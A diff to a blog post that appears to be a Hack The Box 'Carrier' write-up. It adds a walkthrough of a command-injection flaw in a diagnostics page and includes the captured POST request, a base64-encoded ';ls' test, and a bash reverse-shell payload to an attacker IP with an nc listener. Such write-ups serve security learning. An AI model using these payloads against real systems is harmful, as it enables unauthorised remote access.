--- a/_posts/2019-01-12-Carrier.md
+++ b/_posts/2019-01-12-Carrier.md
@@ -25,7 +25,7 @@ Discovered open port 22/tcp on 10.10.10.105
 ...
 ```
 
-From `masscan`, it was revealed that TCP ports 22(SSH) and 80(HTTP) were lisetning for connections. Using this information, a second scan was run using `nmap` to more thoughoughly examine the services listening on the discovered ports.
+From `masscan`, it was revealed that TCP ports 22(SSH) and 80(HTTP) were listening for connections. Using this information, a second scan was run using `nmap` to more thoroughly examine the services listening on the discovered ports.
 
 ```
 root@kali:~/workspace/hackthebox/Carrier# nmap -p 80,22 -sC -sV -oA scans/discovered-tcp 10.10.10.105
@@ -148,7 +148,7 @@ Moving focus back to the Lyghtspeed login page, the web application can be succe
 
 There are a couple of interesting things to note here. 
 
-1. Taking a closer look at the notes accessible from the "Tickets" page reveals some potentially useful information. The content of the juciest note is shown below.
+First, taking a closer look at the notes accessible from the "Tickets" page reveals some potentially useful information. The content of the juciest note is shown below.
 
 ```
 Rx / CastCom. IP Engineering team from one of our upstream ISP called to report a 
@@ -162,7 +162,72 @@ prbl. found, suspect they had stuck routes after the leak and cleared them manua
 
 This content does not seem extremely relevant at the moment, but it could come in handly later. The note suggets that there are some potential network routing issues and that there is an important FTP server in the `10.120.15.0/24` network. The fact that an upstream ISP is reporting that their routes are being "leaked" suggests that the Lyghtspeed ISP may be advertising routes incorrectly through BGP. Recall the diagram mentioned previously that represents three ISPs and their respective ASNs.
 
-2. 
+Second, clicking the "Verify status" button on the "Diagnostics" page results in the return of some diagnostic information.
+
+![diag_status.png](/assets/images/htb/carrier/diag_status.png)
+
+The format of this output suggests that a command such as `ps waux` is being run on the system when the "Verify status" button is clicked. For comparison purposes, the `ps waux | grep tmux` command was run on the attacking system, which results in the following output. Note the similarities to the output in the screenshot above.
+
+```
+root       2371  0.0  0.0   7228  3908 ?        Ss   08:12   0:01 tmux new -s VPN
+root       2591  0.0  0.0   6240  2832 pts/0    S+   08:19   0:00 tmux new -s HTB
+root       4418  0.0  0.0   6140   900 pts/3    S+   11:15   0:00 grep tmux
+```
+
+Knowing this, the request that is made to the server upon clicking "Verify status" was examined using `burpsuite`. 
+
+```
+POST /diag.php HTTP/1.1
+Host: 10.10.10.105
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://10.10.10.105/diag.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 14
+Cookie: PHPSESSID=m147p0q8oh062vka2555d27612
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+check=cXVhZ2dh
+```
+
+From this, the `check` parameter can be modified to achieve different results. For example, removing the `cXVhZ2dh` string from the `check` parameter results in no information being returned from the status check. The characters within `cXVhZ2dh` are all valid base64-encoded characters. Placing the `cXVhZ2dh` value in a local `check.txt` file on the attacking machine and utilizing the `base64` tool to decode the content of the file revals the following:
+
+```
+root@kali:~/workspace/hackthebox/Carrier# base64 -d check.txt 
+quagga
+```
+
+"Quagga" is a network routing software suite for Linux that facilitates the implementation and management of routing protocols such as BGP. It appears that the "Verify status" check is passing the value of the `check` parameter to a command similar to `ps waux | grep $check`, where `$check` is a base64 encoded string.
+
+Burp Suite's "Repeater" functionality was used to test whether there is input sanitzation in place within the PHP code that runs the "Verify status" check. In a request to the webserver, the base64-encoded value `O2xzCg==` was passed as the `check` parameter. The base64-encoded value corresponds to the UTF-8 string `;ls`. This process and the result of the test is shown in the image below.
+
+![sanitize_check.png](/assets/images/htb/carrier/sanitize_check.png)
+
+This confirms that the "Verify status" check is not sanitizing input passed as the `check` parameter and that remote code execution is possible because of this flaw. To gain access to the system, the reverse shell command shown below can be used.
+
+```
+;sh -i >& /dev/tcp/10.10.14.5/4444 0>&1
+```
+
+The command above needs to be base64-encoded, which results in the following string:
+
+```
+O3NoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjUvNDQ0NCAwPiYxCg==
+```
+
+After starting a listener on the attacking system with `nc -lp 4444` and passing the above value as the `check` parameter within a `POST` request to the server using `burpsuite`, a reverse shell connection from the target system is obtained.
+
+![r1_owned.gif](/assets/images/htb/carrier/r1_owned.gif)
+
+As the `root` user of the remote system, the `user.txt` flag can be read.
+
+```
+# cat user.txt
+5649c41d<redacted>
+```
 
 ## Root
 
